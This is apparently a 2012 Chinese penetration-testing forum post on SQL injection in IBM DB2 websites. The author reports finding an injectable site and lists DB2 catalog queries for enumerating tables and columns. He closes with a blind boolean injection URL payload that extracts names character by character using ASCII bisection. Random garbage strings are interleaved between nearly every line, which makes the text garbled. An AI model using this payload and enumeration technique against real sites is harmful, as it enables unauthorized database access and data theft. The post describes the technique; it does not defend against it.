中国网络渗透测试联盟
标题:
Sql Injection in DB2数据库
[打印本页]
作者:
admin
时间:
2012-9-15 14:06
标题:
Sql Injection in DB2数据库
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
9 M3 @9 w; O9 R2 ^4 z
参考了IBM DB2的文档,总结了这样几条:
r; Z4 O6 T* x) f" F
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
* o7 \0 z1 j+ | c: a
可以返回系统中所有用户创建的表(table)名
; X) o1 i& j- b4 U
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
) j0 j9 ?# ^7 B8 _6 w- @) f
返回表中的列名
( U9 @& D% }& `
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
+ F. y7 `- ~. H" Z- y: k+ E
这是最关键的地方,返回第一条记录,类似于sql server中的top 1
6 b$ Z) k( {" [9 I& |. S
4、SUBSTR(string, position, length)
: Q5 v6 I" z1 r5 l+ I
返回字符串子串的函数,类似于mid
; V8 e- q+ g/ }/ t9 p1 t/ b
5、ASCII()这个就不用多说了。
% _* S! S5 |$ R. p$ ?
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
1 X. T3 s ^7 @, l
例如判断第一个table的名称的第一个字符的ascii码是否大于50:
' Q! E& v& t, F& z8 l0 p
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
8 o& ^/ ~* W9 [1 q& [# g
$ p" o6 ?7 c3 {5 Y& i/ l6 V
http://blog.waynedeng.com/blogview.asp?logID=543
5 F( o2 ]8 ]" l8 ~
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2